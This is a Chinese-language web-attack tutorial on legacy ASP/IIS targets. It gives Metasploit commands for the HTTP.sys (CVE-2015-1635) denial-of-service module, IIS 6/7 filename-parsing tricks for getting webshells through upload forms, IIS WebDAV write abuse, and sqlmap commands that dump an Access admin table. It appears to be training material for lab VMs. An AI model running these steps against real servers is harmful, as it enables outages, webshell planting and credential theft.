WEB攻防-asp系列

WEB攻防-asp系列

注意:asp本身已经很少用了,所以很少搞。

环境准备

虚拟机
kali2023镜像
win7

https://blog.csdn.net/zam183/article/details/97786187
https://blog.csdn.net/weixin_37879065/article/details/105685323


项目案例

HTTP.SYS-CVE(中间件)

条件:
安装了IIS6.0以上的Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2版本

HTTP.SYS(CVE-2015-1635)

1、漏洞描述

远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。

2、影响版本

Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2

3、漏洞利用条件

安装了IIS6.0以上的Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2版本

4、漏洞复现

msfconsole

use auxiliary/dos/http/ms15_034_ulonglongadd

set rhosts xx.xx.xx.xx

set rport xx

run

注:某些内网情况下,可以水洞…

WEB攻防-asp系列_第1张图片

漏洞复现

msfconsole

use auxiliary/dos/http/ms15_034_ulonglongadd

set rhosts xx.xx.xx.xx

set rport xx

run

WEB攻防-asp系列_第2张图片

有可能重启,也有可能蓝屏

WEB攻防-asp系列_第3张图片

WEB攻防-asp系列_第4张图片




IIS文件解析


#### IIS 6 解析漏洞!!!

1、该版本默认会将*.asp;.jpg 此种格式的文件名,当成Asp解析

2、该版本默认会将*.asp/目录下的所有文件当成Asp解析。

如:logo.asp;.jpg xx.asp/logo.jpg

注意:这个漏洞当时在当时并不认为是漏洞,更新时没有相关补丁,所以这个漏洞还是可能存在的


IIS 7.x 解析漏洞

在一个文件路径(/xx.jpg)后面加上/xx.php会将/xx.jpg/xx.php 解析为php文件

应用场景:配合文件上传获取Webshell

注意:这个漏洞很少出现了,当时更新后多数都打上补丁了


IIS写权限

IIS<=6.0 目录权限开启写入,开启WebDAV,设置为允许

参考利用:https://cloud.tencent.com/developer/article/2050105


### SQLMAP使用&ACCESS注入

ACCESS数据库无管理帐号密码,顶级架构为表名,列名(字段),数据,所以在注入猜解中一般采用字典猜解表和列再获取数据,猜解简单但又可能出现猜解不到的情况,由于Access数据库在当前安全发展中已很少存在,故直接使用SQLMAP注入,后续再说其他。

python sqlmap.py -u “” --tables //获取表名

python sqlmap.py -u “” --cloumns -T admin //获取admin表名下的列名

python sqlmap.py -u “” --dump -C “” -T admin //获取表名下的列名数据

access没什么好讲的,sqlmap这个后续会提到

你可能感兴趣的:(web安全)